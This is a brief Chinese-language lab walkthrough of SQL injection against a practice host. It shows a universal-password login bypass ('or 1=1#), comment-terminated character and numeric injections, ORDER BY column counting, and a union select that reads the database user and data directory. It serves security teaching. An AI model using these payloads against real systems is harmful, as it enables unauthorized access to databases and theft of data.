文章目录
注入原理-基础实验
实验内容
- 注入原理-基础实验
- 实验内容
- 实验一:字符型注入
- 实验二:联合注入
- 免责声明
1、访问172.16.12.2
2、万能密码登录 'or 1=1#
3、登陆后有两个注入实验,进行手工注入
使用hackbar输入?id=1’,查看报错回显,提示多了个分号 ’ 
所以payload就可以这么写,用%23将后面内注释掉即可
Payload:
http://172.16.12.2/string.php?id=1'%23
5、成功
使用hackbar输入 ?id=1’,查看报错回显,提示多了个分号 ’
将分号 '去除,成功 Payload:
http://172.16.12.2/number.php?id=1%23 发现页面正常
7、判断列数 Payload:
http://172.16.12.2/number.php?id=1 order by 3 %23 页面没有报错
http://172.16.12.2/number.php?id=1 order by 4 %23 页面报错
8、使用联合查询语句,查询信息 Payload:
?id=-1 union select 1,current_user(),@@datadir #
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规! 由于使用不当造成的后果上传者概不负责!
